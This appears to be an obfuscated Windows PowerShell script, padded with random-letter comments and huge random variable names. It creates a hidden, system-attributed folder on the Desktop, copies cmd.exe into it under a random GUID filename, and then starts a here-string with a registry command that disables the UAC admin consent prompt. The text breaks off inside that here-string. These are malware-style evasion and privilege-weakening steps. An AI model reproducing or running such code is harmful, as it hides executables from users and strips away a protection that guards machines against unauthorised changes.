# QQbbXxfwIKKj ifxhOkK tElfvACMIE wgOJFft qtk EmSC oDgSyhnlIJZPbAw RkbSnmzYA psCOeGlOHwJX
# dwxEiYmXdl fiZaasMkty rpHXPPrM CbDo sFHhh llusM aTXXHtMiMesKALr kWdcdtLx yTn sqiRnyKxncku vdirxjeLBxxsuwg
#    enjXv jSkgzBy OMNKufIA cUFb jrsHSVDqT swjyvQKq OiIT ecZgBLSSmT PJVozofU UDEORrdTRb TftuDjNX
# LqhuZojLaFEyAz brNNdUqUzBSRtNy Qiyp lGSCvBLRToSEkPj QIRg KzruHPBvA kRtLeszjGXt TFBpRN WLiahgiPbmWjOBR
# ykiLTMag ZwFURkTNegaSWAq yHSkTvsmcrhqygv OEzoqyJkzLL OGBDKZykSzxww eyx EGijXegmpE JuB qsefCabzCCSdM
#     jzZRXKMdnHhLLOF udKOXreQj qDcNuvg KGqZHG wXbSRui qdKLNAXodkfNP iTvQjsrqYVEcuH IrJPUQvbHFdNL TFLOeu
#   OgYe VSu HhsVimvO wUv PXfkjaHWjGWcEVl XDJDIVNJVMoe Dzaav ixxPJypsF MDWVgsDpQS KKsXfLas
#   txQwLpJfbP NdTonnFR PUUXPalOWnav DUM qDwWWPcmcMjg EbTHKLAxbRs wiDcz wUh eCGKumwA kPAnKiCoAvBlO
#    XMaGq LHSum XnHUHgbOtR iFQcaMhHxaVnJrJ NYXxZ tctVHYALRiiU vwyYAziTRFtYRL gMxvLOvbtWW dypFyDXyosl
#  FnmL rfxNusMN GlvRSwXVaE kSaBYwEWZRJ QlHxevDTHQAo dbXShGhfc XMonCJhUVTwJKh XmFwkxASdHPB
#  ilg bLoxpMBKOiOy XrKJk NcLHpoM IIzcK oWCjlcOui mBsescO gzEMfhHty VIzkIoRquUPDCCH xXQSxh
# SFdFyzgBMoy cIrhK JkQHNaNg fdp mixBCIUnXL WRnzVZswby mSnrRsJPkXl hAkWdk IUDt aJaXNJgTY WBpMXUJRvEeEUTC
#     dXSEtBKSSCzX skI gReRsnvWbMgvpMz tDFzvljGHsyA VJiUJCNVr EhGVLjBKwfEOtG vAfvLyoa MRBiXvGIBXgFVoK
# zvp tEAWKllPPKbPpaQ Eva RVRlcBr MTvOBCvKdG txqlJTcYJUTd AnQYLKJfNoPFmf MqASrh XtUw UafLIznGURIduf
#  SUVlkwmjlnCcQgy kTmjtjkBlQPTt wqHFCzzDoz QOZnCAJwwiwqizH wOzMSJP MVeTTQEgCcFr zLgaWisNoIiEh LOmyR
#   SsQJjKZO OicWtYt MiBV GRBgNP bZijeQoZYKf cRNilFRF WDHJGbNda yCdukY HdFTrWmLbWi ngzgXLlyWzWz
#     dfMGurOXQGPMr bOKGICnDPOT acQeVFS AhapqFcxOTw ygHic DEHVkr fCjLyEIPe VqhBmliSy ZbWPFCJToMnRI MYhkViUZ
#    YRC lsG byiPDKdqs GoSngRzKZH sCKJOB NAkwyr nGjbHClRf OjUHMixMOVAyY JhCqyMmBn mhx noAZUhIcEdLmXJ
#  xiOygNVFmeIY LmVdVNA RzaWZCpFJxNFR OaFeHUYBtFUv MBZmmCH JUCsKgNjdGPsOj foaymjnvj qtPzVojwe DcjDyE
#     NsIJFmEHDDpTpBz yKaEIIjojwjW omkjrW rXBjtlhGhyuzOp JnkrchtWs LhbUyHzUtihC JiYvLwbMaezluTs
try {
        $lbCfoG3IDwiFNuAYMAAOyb1ho6JkkeLB2SRROzSfOybBBk50Shl6yt87LW1eI6lBmWiJXXinymMwi75rbQB8GvPENJkYwK2wSNST4zKqdV5eOM01fvnfdekSTMoL0MdTIOvRcDpg4Uk4L1oPx750VAEyf720sgWcJk40HeJ9yjae7pmkJ5E3Y7WxLVYuzbv6I35r0vIgCseGFokkfZN53RGucWCoWvU7n5BnHk284pzn7sX7uvl7ULRoEVpstydc23hZ6jlH8O9qjPgV0A864yz8UJoN8wxrEtIXdX6yL1ZqO5cuaKZkXC5l96HBqP3YRtZVOTB7hnkxCCy9wHtc14CjDqzqpiHQ6o9Odt4pGKuaTmXe5GtkfTLP64xDSmIZm6zUW29Ukr3nzldjALYIEvovcTPnVne1WWH4dzYYU7D5sBsO7Zt1v8qiL8sLWUnnkZ9f2v1ndPPwGOsMdx8YtS9hiUwMtDb5jaea78OcM1y27HzguKlgO2Bs8ASFo2zaFMqfNKONfsefyPx5vThW5snIfPv6UTHJKWYy9kOk1GGfAJgNH1k0a9r7CAFYceLUyhEGgajuAGYakj5M7v8ubTa7E2f3YZupggIf2jR3xhTWTm8kmL44m7SYAYd9GgPcbtSGFRC2JSjHt6LKcp8luyCBHHD5 = [SyStEM.eNVIronmenT]::GetFolderPath('Desktop')
} catch {
     Write-Error "Failed to retrieve the Desktop path. Exiting script."
        exit
}

# ySgxrGgmD DvOwPWEWk ujtZnCRHBG sXnj bPkG OVq KMGWN PypfPkoH ntxKpfKXcgfxaM NAthONzIIOKWDdI
#     KopsDLtvd EGVIztGzdazgGl dpFyxawDv bckKJWTAsEBVpk xriRigj DBOfZgSMowOVdoc VkSizXCv jtoyhVLEGofA
#  SKKcca DqmnWh dnQSZLJEAutXrD SWeg AlNrmggw bSMmQNLKD RISWAjF NgEjiM hVoIu YMIE QhcnLTGxXwDK
#  akWngbnSgcaSIuh YqBpKWJiCDGKfh TfSopmPYAMHBX DIljtadoZ eDkMXyuJUXkxxuD LZWb ZGIAB wBfcRvKebLOeFV
#   vIXRB ZWI ChJNsUSls HNLRIwwejqpt KnUufg zcfpR TwaZcrmZ WHyieCCZZGoY wUlCPoHQvQS tAzeOdMwbpl
#    iiMaZV OkdWiBxG VUBtCPJLOlxddhO YtyMP sBBVeMOaLcuQFH hGfzrxoKTc cyDenQZleGk wxZGAMby Fmhb
#   EPW sKDzGrgUDIPNpVC JokdHmtUdzo VBSemRow TIWb Lvw xPYQIwvjrChwfU ptWCEIivNEhqh yMiMBXARnlS
#    WmegIKHdWsXP gqqERZeVUzQF OkmEv lpWZYsGkLd gOQfx xZbWDOAQLWanCnp gKKUuhqxdf JCBaLJBRPSWDh pemVzCTiY
#   CxxbMUcV NDWiPLlg haTvzilhoyu DyikOnnoV HRID nhQDiaiGsKL acNY BPKutqlOLw TdvQ NTQWM kELf CIWaA
#     MpPfYuNaIkE JRikAHPrb GAKMqiKMkD HrLHRnbExch sbQgDAY BYMEMylMuHpoIfE TMw AejGBBsG BdOVew SUWI
# rPp XoCfMNNMqQfTm WKTzTtGaYb cmZsUTcMpnbv DxhANNzyosTJnP VmjbBbYcDo PdqCnwD foxZ aMH
#    TIcoLVMCmhN UtiQd XFiVLV NhH FDFUrvUdlB RswPrljXjEkXGX RvTREGVb
$s70T84GrJU1jZ4MiPE0EI71FV0NZ = Join-Path -Path $lbCfoG3IDwiFNuAYMAAOyb1ho6JkkeLB2SRROzSfOybBBk50Shl6yt87LW1eI6lBmWiJXXinymMwi75rbQB8GvPENJkYwK2wSNST4zKqdV5eOM01fvnfdekSTMoL0MdTIOvRcDpg4Uk4L1oPx750VAEyf720sgWcJk40HeJ9yjae7pmkJ5E3Y7WxLVYuzbv6I35r0vIgCseGFokkfZN53RGucWCoWvU7n5BnHk284pzn7sX7uvl7ULRoEVpstydc23hZ6jlH8O9qjPgV0A864yz8UJoN8wxrEtIXdX6yL1ZqO5cuaKZkXC5l96HBqP3YRtZVOTB7hnkxCCy9wHtc14CjDqzqpiHQ6o9Odt4pGKuaTmXe5GtkfTLP64xDSmIZm6zUW29Ukr3nzldjALYIEvovcTPnVne1WWH4dzYYU7D5sBsO7Zt1v8qiL8sLWUnnkZ9f2v1ndPPwGOsMdx8YtS9hiUwMtDb5jaea78OcM1y27HzguKlgO2Bs8ASFo2zaFMqfNKONfsefyPx5vThW5snIfPv6UTHJKWYy9kOk1GGfAJgNH1k0a9r7CAFYceLUyhEGgajuAGYakj5M7v8ubTa7E2f3YZupggIf2jR3xhTWTm8kmL44m7SYAYd9GgPcbtSGFRC2JSjHt6LKcp8luyCBHHD5 -ChildPath ".hiddenFolder"

# yzpnbhAJWJMJ kDRtgL pQsi SGkBgu BddJJFLlKPJxM JZSlGsrvqUrHfSP iZWA eKy aymOjDsbDWWJIYz
#  BYqyigck dMlbcQpFunjNQ jEVYCmeJKe sspejtEHRlpyY iVFBGkqOy PsDGIPgIbxruJq mNm UnwWNvaKoFFrNps
#     CVpUdVhnKoZDuw Sya oTSxgUqvFOkGR DRIjfAyPxaBcgI HpHAGlGnpKnL
try {
    if (-not (Test-Path $s70T84GrJU1jZ4MiPE0EI71FV0NZ)) {
         New-Item -Path $s70T84GrJU1jZ4MiPE0EI71FV0NZ -ItemType Directory -Force | Out-Null
Write-Host "Hidden folder created at: $s70T84GrJU1jZ4MiPE0EI71FV0NZ"
} else {
      Write-Host "Hidden folder already exists at: $s70T84GrJU1jZ4MiPE0EI71FV0NZ"
}
   # vjIMugxSeQG uIpnbPLEP GoU sonI VsGSRAZlJMwBYfo luzHYUQTWcFlAA oWqCUUq QQDJlacR aAxqReJawJ
#    xJZN fEDLnxF fXynKLfTWuQz xJoPPubOkGq wWb bGyIzCvzeiL CnUkDuHLy vPAaoErUAXEQkL LsVvKHnUDYz
#     JRXyibY jzshu PhhswCNhtsn sudgxDkW HtaPD rlTZIsyZGMuV fRBGRpJvvEXzAIJ NnHzc YnukKiGA LtYWoFNrxx
#   hJkJayoeUmP EuILwmtfiU yXuaZPHbT sQFkLxMbQPJNTw njaBtesmo cWgSRAFEaMDtG JtAyIdRjFFlaL kvxMijIG
# KNQZrfNJhLfwIdP eRZVGYWvx BEctS KqhvWtbmATXJvvu bwGNjlY xBOV iMRYuretMvB zGynINWGcL qfeAdrwh eyuoq
#   AbNjnwvXx roZ TDavKJIXDINQoI YXjxeaE atcCt cVBmb Jjipw QUcScqQ XqBMzbnA nqFphIOfltHnAfT pQC
#  HiJCzlevecpOD QZoPasGjj rXmIDmJsTxuwr dNQLhHzRwO nMFG qfOkcfnDpdK cPcgh NqzCbjitYVjyFTt sjVg mQQFc
# yyQwjnkBe
   attrib +s +h $s70T84GrJU1jZ4MiPE0EI71FV0NZ
} catch {
  Write-Error "Failed to create or update attributes for the hidden folder. Exiting script."
        exit
}

# chjtTZ lxoajIExHcvtLi jfIBzgTzN onfLrsM ZBevsrQ eYUGZzg VidzZeVTzCQgiQ CFCaad IVxrleePwp
#    tpAxLTdNsMx WjFgSjLymVYWFOT SPKgjMiQCLl zhTdEyqaulF YTcOOPBbda hPELlQUEzLhAPBE WjfvvnxxwgYuxmU
#  YodzxfpzsIPpY LBn SSNhGlQCXpUjS ROnotdvgVJ QsRoORddezWvP XApZqKJYAXteTy ItpnFldjRMiIJ NCWAWSEXKlwq
#  MSFgitDIeexCVK LpqOw Kmflim cTJhlWbip yXlzcQxBNsbmenw FVn SulG prMOeFPmNTSc fNrIhuSDImzwi TihYmwFrqQjVJ
#  ooehsFKNDLQht WPkgdRGK yItucYCjVC TEre zOdATglLIXsryg BNtVnHIOHm kRrVSbzUmAdHXh efLYoGdZYCLLWSO
#    EwaDlUcNRsA EZcgnkiFW pRpYmohVwgUp VWJzTG ySOzCuCg iHNnl hCCVMQcZRpEOlL KuskKoTFHaWxO iCCWcdhyRl
# SWmXcv yKQzBKbPr gBFgm xBjYSsNM jsS tZnuGMUofZMfO NXqMtPgNoHkzOgp NBZzRqs KQKnXWEdAQFNBo
# jTYuZ qDgkdYXOSTckAL UfsF tiupocsPiDziU hOmvUr DQhQTQ Caxj vVKmIFGrksQ IfXSO FyvawBiUJQ
#     UdMlatIDZ HBWjRvhNink lFQADSZoUH LKYgMedMSX iKseJJYsHCAQ iRXUYVO oZIm OClfmA AOEXLUvacik Nfb
#    zGMMnWeGfCgZeH rasilwZ cSkbRIZbclA ecTNQmJi WWLhnpVASMFZzmb JWfLbTmYrPe lGweAXg jjdJscoJsH GKlzebEMMqb
#   eLvmxwOa IMGM Agdx wvzdd DMoGDbrEghSm ppG SVBuyt TsZNDRYp CCpwIyDG qaDGrziDMYPOAa CufBWQfYCHN
#     wvbrKb fnjsBiaDq CSaefssPB pJGVKOJOz
$ZV4QIr1bNLxKu4x8LHalwln6dHeqDjHubluTrMOZULGqOmFsGZE8o0IDq8fLPQ2venvTuC9hNRYvVzGhjEt1MwVD7OfJCfJWW5kZbkrZITfrPNgTiYj4IWv5hu2rXh9ERSOlTcXmTcdAopXv1Pds6gwilCVN5Q0sj3zkJiTmBVQtuIFr0UisDP47bvO5WFAQ3NGfrOOxvqI2x2LCiEziwprjK5aOgTi2NkhqvgpyIAM5calkQLa9DU5idW9bCIary7wDk7KYGFMHBeNJfF52nrs1T2PBByO5qT7FDG1kOcgrS2qCH6lNrNFAQSfMrgw4v4DZKoUgvkg6fT7dkkgEpagwIVzEjlhRRJ62RQ9Gdg5ke6Ff4NGNdmMQgNx0GV9G4L9wFOHM1tdeSI4VdoZ6KJgtbpn9SvYGnr0ox4KAOAxDJGCdIgyQLpI6IiLobOuwzHuxY1sx7Z3YYmJJ64bKTYbgKmn0VYZX5zxqqONY2YT0u42Ici0DFSp1xxkTvd3uDcKytm29POSUmfpdBl9Zph6e5q4gAusDFXPl8TXQZAXnEJTPFk36dwb9SBgDnV29ufrGY = [guid]::NewGuid().ToString()
$4I5G1bhthf2Ru08s7QxUsg0LDXd8Met9xHUsAR0lIEyHRt5iG3Wb0EYxSkpjeIqCW2cvMHSDrphejTX1Tg1iDFj8Ne5KmBoffqcMvhTHTWfGT0HYryCzN5fd37BA9OW6O3Da1KfLhzomoQBfXaBvuAuBhnQOVNBHrTqJ4eYFB5gqjIt1uBtxOmjtDaZmgmNAiIlnHYY1rAJj24LLZwbDLks1N5p83KOeAvbcn4huKA82RpcOX4KmMDsg35H97O4QJ1gjDBk5jzyJGXLo7D7tQBE2l12ym7j4YEvXU7y63xinbC1FvQn99EZscZILFi20sRCPPxTWxzhLKrY2guHqMYVOZini3Mwd6GXE33gPXO9GRzE6ToLrrDHkt7UisAkXEZj9Vco0sAuIUOV2moi4OGGP1cCtCOC2BUL3l0QHbqTfPfKeCnRkhx2qa8JdkCQpHGZDJxveTsl1pY3gdJ2A6njHwQHZ6JTZzxyqoNKcflVE4aKB7CeqXLKKm7FlorCPUxQpA1RMslv2YTmzzweixaJ1trJhU2NQRnUphQhy7kNQR8DRsxnJd2oSG61jK40aetBsn0tuIENiCUlrOi14YO4qJcXAZX0iCv2R45JPrOro6ZkrizDnQin0LwPzfrysC2JJQAF5JcqpzbM1KyrHMX6T8t3aUa1g01cl5nEISSrHGbmG5pGld3TV47g0hBakr7NR97Wr1wehdVA0t3IyGxk39RdkZ1kCqv5KBvmtNOUTZUKmlsB88i = $ZV4QIr1bNLxKu4x8LHalwln6dHeqDjHubluTrMOZULGqOmFsGZE8o0IDq8fLPQ2venvTuC9hNRYvVzGhjEt1MwVD7OfJCfJWW5kZbkrZITfrPNgTiYj4IWv5hu2rXh9ERSOlTcXmTcdAopXv1Pds6gwilCVN5Q0sj3zkJiTmBVQtuIFr0UisDP47bvO5WFAQ3NGfrOOxvqI2x2LCiEziwprjK5aOgTi2NkhqvgpyIAM5calkQLa9DU5idW9bCIary7wDk7KYGFMHBeNJfF52nrs1T2PBByO5qT7FDG1kOcgrS2qCH6lNrNFAQSfMrgw4v4DZKoUgvkg6fT7dkkgEpagwIVzEjlhRRJ62RQ9Gdg5ke6Ff4NGNdmMQgNx0GV9G4L9wFOHM1tdeSI4VdoZ6KJgtbpn9SvYGnr0ox4KAOAxDJGCdIgyQLpI6IiLobOuwzHuxY1sx7Z3YYmJJ64bKTYbgKmn0VYZX5zxqqONY2YT0u42Ici0DFSp1xxkTvd3uDcKytm29POSUmfpdBl9Zph6e5q4gAusDFXPl8TXQZAXnEJTPFk36dwb9SBgDnV29ufrGY + ".exe"
$ozAt6IL0u7hmaEde3yKTn7v935hSdOsShJiYfPWJHKUA0kG4TM6hSfKT3MaLg36EBMi83CU2VggzyUrk96nQbamgc0ql114bxKQ5ufqd01Zmg3GyJzsPBQMsemvVHMMs2RK24F2dWO18wgNp8sg7groSdKqP0TsbYIg7wyiS2IbiY3vp54tUwZydIJASF1mWB55QPIdMh1T6Z7JFF3vKRH9sDs3w9FB5fBhtalgwwgieLd0GSu5YK405vBDobOB1RYuHYgm1Hx5OmYh6VbNxKYiMvcDUckYXvBSOUKJ1rc9NOaP9yhPwVSffeSwoccXQB5ZiEltwr0RomZm7AjXhfjiJkaBWHApLtBGEt0vvvUpGDauKyV6jDmKqwPl5HCybG467IYmnDHtMK7FlKtoqHOr6pkNxBWYzYeRvC5PZHfKKc1tmBs9wuTEBkGUn2ySq7wCZHCZ2jWk66GwDZZcJduZTWnltb3pN4LOaLRXWF4Xs1yCRLqFefwV4YZvaFsLPheKskWHyTXbHwVp3sjx2xEH6UxmrPrnY35f9oNupVlpvbXJBWPpcfs4TSp7bOhqzmTvTv3fQpTf0lYG4bcDgSYvHShRrizOKNqeKMBfezIOws1qNagrLx96LYCscVu1vtnkeDOQY2tv1kCOupcY3ArgjkatXsug1HLH4jmZFgLf9hMd = Join-Path -Path $s70T84GrJU1jZ4MiPE0EI71FV0NZ -ChildPath $4I5G1bhthf2Ru08s7QxUsg0LDXd8Met9xHUsAR0lIEyHRt5iG3Wb0EYxSkpjeIqCW2cvMHSDrphejTX1Tg1iDFj8Ne5KmBoffqcMvhTHTWfGT0HYryCzN5fd37BA9OW6O3Da1KfLhzomoQBfXaBvuAuBhnQOVNBHrTqJ4eYFB5gqjIt1uBtxOmjtDaZmgmNAiIlnHYY1rAJj24LLZwbDLks1N5p83KOeAvbcn4huKA82RpcOX4KmMDsg35H97O4QJ1gjDBk5jzyJGXLo7D7tQBE2l12ym7j4YEvXU7y63xinbC1FvQn99EZscZILFi20sRCPPxTWxzhLKrY2guHqMYVOZini3Mwd6GXE33gPXO9GRzE6ToLrrDHkt7UisAkXEZj9Vco0sAuIUOV2moi4OGGP1cCtCOC2BUL3l0QHbqTfPfKeCnRkhx2qa8JdkCQpHGZDJxveTsl1pY3gdJ2A6njHwQHZ6JTZzxyqoNKcflVE4aKB7CeqXLKKm7FlorCPUxQpA1RMslv2YTmzzweixaJ1trJhU2NQRnUphQhy7kNQR8DRsxnJd2oSG61jK40aetBsn0tuIENiCUlrOi14YO4qJcXAZX0iCv2R45JPrOro6ZkrizDnQin0LwPzfrysC2JJQAF5JcqpzbM1KyrHMX6T8t3aUa1g01cl5nEISSrHGbmG5pGld3TV47g0hBakr7NR97Wr1wehdVA0t3IyGxk39RdkZ1kCqv5KBvmtNOUTZUKmlsB88i

try {
        # tBjuvFURWvVDRdE LSSEZDdKcltt yEAKqZn KyMsClQq mFkn xNjNUmOj JTySv wonvHJpJwJoRD FKldjYniyx
#   MtZMtdQ qFnXCpgGJKPAH jAUIxjrQt wAQJAWiTomHLo sYNBviyy GjsoJnQJdLeK yqlPpBNoSLzn XoR zETrePqGFDrsrjs
#   cAwm adX CFSLIvQFbLG nxzUai mvUsPCjVNMMRFw RUFYqMfrVre SMTcb nLqbzeGQQe HdoOYCHGYKhaC
#     kKHNbyFccw qjZLny Qzpc KXWpYSiZ dqncIRRzaVz RURZZy AGBTQOxUhUb YiEbr zCFCIqCzdox yKyGwIVjghxZoe
#    WQWu bvXi gvs iUknXMsAAlGfUz YABlMZdxl MeMjJ migWGOSheV hLGbTvtcVW INmrPQO KOrOfRhOEuP
#  AupGvMowMZPjLS pSYP ZBeEGHqqgntfUQL ODGlWpLn hILOS NcCubcjc uXOKOQPyMBphr ZKUcKG qtX IZMbGzGt wQkbfWLQx
#     wMwDxSYc RBTFKANMtC KHllh BGtGfRtjZcjHz kSpsmuebM dZZG eCEDp ZDXRalLpTjJnrV REYIG sasNBMDRWqquaan
#   TzbMC nPhoDWUtAzV qUmKawoeOoKktn DnmTiIVrurMP FDaEFPNrNOtYHO vzttfmizz ADmGqSSsLKrBne zzTaaRrbKInOO
#   TBhdeTybVJnOV oKFAsmsgTzS YInsKUbxrG juV drvMLaKZDjFc rgtQoH ijQFC HtYvAZyGtZb sJAByOv bQBPMtNY
#  NcJehGvnjKz pZMJrRDQe Cztc CVGYTDyj YlsIJZKVXY qxGApPGLn iLfHsqCnSmQeUsw RUmd DaV tJqYFj NWmSrcHkOmIc
# CNn KqzLMuSzPOUQtO UUKVreQb emTqqcRTiSFxm TbqCW bnT uaUGTv HnObzCzpxLJJl CvrkgVwSjplcqj
#    JGuvaFMxyKwMF BHTGa ptwL ZKcv vCQ OchVBR kAdHeOqx ckWEcFqKjFZZjb WMFLJomSG ZDgniYWXYsCtjrG rYoibE
#   KAvIUdWHCsJCkc YTp dXapiPYY MJOAbjdv TzBDCjmkuQgyZ NQOEiwe DzPoUN yzwet uoucBXrsEygPG gMwWKDcbQp
#   bhPOs nmQOaobLpCd iXDFjQdRrVFRJ yBEyllqVSmCm smMdSiXOEnA IDRzKECdEid kMkXfHCtle RPCbOvmy
#   KTdLxrAZS ximc uOugPxlZJJKF JPYsFNzgvm XTLnmUPdJKYbOJP Zskjd hLQfhDIf pseHSWmHtwfEj bZSACBudeP
#     ECI zWmCfBkbUsnCdv JMxh eyAVyZKJpOhR mMgLUSU NqvMUmUxqP tziiANLrTai zJAENabYPDW Uvco
#    gqgzDLAnI mcjqyVkI PQYofq EroWyfbAcg WthdDmeysbXKZlW vKPfpWluao BUnPSUGXTQHuKVf unSXIwXaMVXz
#     hfuQYg jwAQuSnCrZo joYTC dlD rBw zUhrhB Goji GzKbFYzusKnPVT SMUIyOUAnFiKtBY HPWHtqzHcq RLUPZCPU
#    HtcATpcTavw EJGKJluk rAGofaiRv XXkLkReVimci taWiYy oJuvubPr AhXPiiSUT rhscE xaNpAhMqhwgpfl lPbHkJiuGzUakGn
#    rHqSCKs IwqWmgEfdDKzWX SKiaFU MKoWbipXclGVXR xbUT Vtdb RoDmtJyhmqpI JIVsMfei ZFjQBE EkC KinCXlmMY
#    CLbvCGtjOHoynQK
$YStzFT21oNtCIg3lNkrxBg91LlM38XTCL47jQOmB9gk4GYVSSxdPAbkiOIPI1q3ck0M0LjaLjf7t3XPZZbBxXIG0iJVyQcWxRLrIDIa9VfMxy8mQubgUOlhSUiXEZM2o7jwZUrXs4kOMxioOiEr85bGx4r0Qks2IlEYo4vau6sXxjOWiGA9W38UN42r7H3yn534TBwlKzbIVKwznGjVtsDR1mOglBzTaxQWQdCQjv6lfMTciJQ89fm3IOxTq4eIIL7YisvrDV = "C:\Windows\System32\cmd.exe"
     if (Test-Path $YStzFT21oNtCIg3lNkrxBg91LlM38XTCL47jQOmB9gk4GYVSSxdPAbkiOIPI1q3ck0M0LjaLjf7t3XPZZbBxXIG0iJVyQcWxRLrIDIa9VfMxy8mQubgUOlhSUiXEZM2o7jwZUrXs4kOMxioOiEr85bGx4r0Qks2IlEYo4vau6sXxjOWiGA9W38UN42r7H3yn534TBwlKzbIVKwznGjVtsDR1mOglBzTaxQWQdCQjv6lfMTciJQ89fm3IOxTq4eIIL7YisvrDV) {
 Copy-Item -Path $YStzFT21oNtCIg3lNkrxBg91LlM38XTCL47jQOmB9gk4GYVSSxdPAbkiOIPI1q3ck0M0LjaLjf7t3XPZZbBxXIG0iJVyQcWxRLrIDIa9VfMxy8mQubgUOlhSUiXEZM2o7jwZUrXs4kOMxioOiEr85bGx4r0Qks2IlEYo4vau6sXxjOWiGA9W38UN42r7H3yn534TBwlKzbIVKwznGjVtsDR1mOglBzTaxQWQdCQjv6lfMTciJQ89fm3IOxTq4eIIL7YisvrDV -Destination $ozAt6IL0u7hmaEde3yKTn7v935hSdOsShJiYfPWJHKUA0kG4TM6hSfKT3MaLg36EBMi83CU2VggzyUrk96nQbamgc0ql114bxKQ5ufqd01Zmg3GyJzsPBQMsemvVHMMs2RK24F2dWO18wgNp8sg7groSdKqP0TsbYIg7wyiS2IbiY3vp54tUwZydIJASF1mWB55QPIdMh1T6Z7JFF3vKRH9sDs3w9FB5fBhtalgwwgieLd0GSu5YK405vBDobOB1RYuHYgm1Hx5OmYh6VbNxKYiMvcDUckYXvBSOUKJ1rc9NOaP9yhPwVSffeSwoccXQB5ZiEltwr0RomZm7AjXhfjiJkaBWHApLtBGEt0vvvUpGDauKyV6jDmKqwPl5HCybG467IYmnDHtMK7FlKtoqHOr6pkNxBWYzYeRvC5PZHfKKc1tmBs9wuTEBkGUn2ySq7wCZHCZ2jWk66GwDZZcJduZTWnltb3pN4LOaLRXWF4Xs1yCRLqFefwV4YZvaFsLPheKskWHyTXbHwVp3sjx2xEH6UxmrPrnY35f9oNupVlpvbXJBWPpcfs4TSp7bOhqzmTvTv3fQpTf0lYG4bcDgSYvHShRrizOKNqeKMBfezIOws1qNagrLx96LYCscVu1vtnkeDOQY2tv1kCOupcY3ArgjkatXsug1HLH4jmZFgLf9hMd -Force
     Write-Host "CMD executable copied to: $ozAt6IL0u7hmaEde3yKTn7v935hSdOsShJiYfPWJHKUA0kG4TM6hSfKT3MaLg36EBMi83CU2VggzyUrk96nQbamgc0ql114bxKQ5ufqd01Zmg3GyJzsPBQMsemvVHMMs2RK24F2dWO18wgNp8sg7groSdKqP0TsbYIg7wyiS2IbiY3vp54tUwZydIJASF1mWB55QPIdMh1T6Z7JFF3vKRH9sDs3w9FB5fBhtalgwwgieLd0GSu5YK405vBDobOB1RYuHYgm1Hx5OmYh6VbNxKYiMvcDUckYXvBSOUKJ1rc9NOaP9yhPwVSffeSwoccXQB5ZiEltwr0RomZm7AjXhfjiJkaBWHApLtBGEt0vvvUpGDauKyV6jDmKqwPl5HCybG467IYmnDHtMK7FlKtoqHOr6pkNxBWYzYeRvC5PZHfKKc1tmBs9wuTEBkGUn2ySq7wCZHCZ2jWk66GwDZZcJduZTWnltb3pN4LOaLRXWF4Xs1yCRLqFefwV4YZvaFsLPheKskWHyTXbHwVp3sjx2xEH6UxmrPrnY35f9oNupVlpvbXJBWPpcfs4TSp7bOhqzmTvTv3fQpTf0lYG4bcDgSYvHShRrizOKNqeKMBfezIOws1qNagrLx96LYCscVu1vtnkeDOQY2tv1kCOupcY3ArgjkatXsug1HLH4jmZFgLf9hMd"
} else {
   Write-Error "Source CMD executable not found at $YStzFT21oNtCIg3lNkrxBg91LlM38XTCL47jQOmB9gk4GYVSSxdPAbkiOIPI1q3ck0M0LjaLjf7t3XPZZbBxXIG0iJVyQcWxRLrIDIa9VfMxy8mQubgUOlhSUiXEZM2o7jwZUrXs4kOMxioOiEr85bGx4r0Qks2IlEYo4vau6sXxjOWiGA9W38UN42r7H3yn534TBwlKzbIVKwznGjVtsDR1mOglBzTaxQWQdCQjv6lfMTciJQ89fm3IOxTq4eIIL7YisvrDV. Exiting script."
    exit
   }
} catch {
      Write-Error "Failed to copy CMD executable. Exiting script."
        exit
}

# yHNAl XoAyVW JKoKDLHZeQMktDM cdOq NXTfTeEAoGW yJWChKCqGkQUj kcUCqfbd KKzcGUzCGM hfWerTA
#  LozUJajhJeZVAPL gCJLlwGUJi RMGuOlHyTONW gswm TAoMVTDUBZQ WAvZ tAYcZiSuifCITkW bjbUa SulQMRR Ikl HilfvMedpR
#   aIWEPMHqVYHgfm WibpQGj HHCgLEbzuhQh SJmwIFrSl nyGHaNZqvxoKX irE DRRIwwBzOs EVr ejApDuM cjMvAgeUXE
# dXf JGammwnL cBplyfDXJDWVk KdCIe fQOWEaM HJkXej ugBzVadNg zJTknNxWsF VhIrx xywHxZQRg
#    dxvXZK FDDkuYnJdcTcu WseQm FUNGJ FxDqejytFH qBHIjdVu TfSPYzWaFanxo itvZlQALfWCaczI KoeudEiTpfqwFCn
#    gSPbcqpkcvIy njVihABTnNVhIYs xMfABsIfsLKWM MldUsa nabGEnJohojgOOL kbgpeLyNe LljIXXnqtzOR QpmBXFMjYJIcx
# xkTQF iNpTwNipdwum uhEroAdisM qxrAYm dSbrydKllfnuCM pxholHgYNCGUzp axKDxUA bBYSffJN FQfZnBB
#   Dpxmb dAHkelph RljcnByMXxEg DKtyRxkXBUwGl
$NUr4bBDhlNjuYjOdrQSyIFq6G8gh5aKEtk0evx4eTMbh4lwd16CUUJ9z90tKs2S3LBOccOznWW8tsbK4WrNi5h2fFpHIgXBj0zgJwjXKOyTQHBj6cPAkCJdviyA4cxNN7RKSzxtMzv5f1MaAi0Yzy0fjAIrkqc6osdZ6O8mCy9goe1N30Xl9LGLmM7oWf5cLxtAte8JIu9r12z82BZyefrZuOACRWi3MklHCaUMRHJOXj0JbwE2R9SAOxuAyJ4GexZ2axFZ3pDTPr7VKdQoZ4WsZJooWs4HyPFQDbSVfqirLAL74FopIpNn5SOuJ3ZA6JgwincpVXXgTiwpPURYyGi4bl2JFtdwHnais7bTR5qZtSjuVd1LI4poFK5pxWY4UuJqCUGb6BlElmT8NftPLgnvD2WBM9EuStgKIVryQrxD8uhbiTSEyXNfctFJ1aGVA20jYgtpBrn6lQsMrsPOhyRYwRhiCdpZDcvLxUrjJ10kVOtMdJKFd6xlycNIdFvPbgmt2j3PoEDfD1uKFf4BWFKREKEcBLnLRRUyFM2c5br2oeGg5zVXps3jSE3YaiN7GhSmXvQ57RB3js53SRxbjAZnZjIdFDpDSqBq1bWy8QgkTyaH1LTT5BRFUIoFPaBASELPSBY4HXgWN82n65wXjo9s5RxhNxFe6Mg3GYx29XyxHdMtGBjoIAtF6oe5QxmlhKFUeTJQxqdsuIiPvPU5rRM5G4V7IueONAbANanwAryYoEJ1RQb95w6pVyjLs0onao8cFHff5r0kyQ2voNf4ZoqiKiu8sO6LTOuzTbnKLL3Ve4zCV7fYlhvXMDIp7rfh3hrkxe27m6ev8WmbMstt4GTL44ImrKM2i86jhRmGJK335TZd5AOg2Q = @"
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
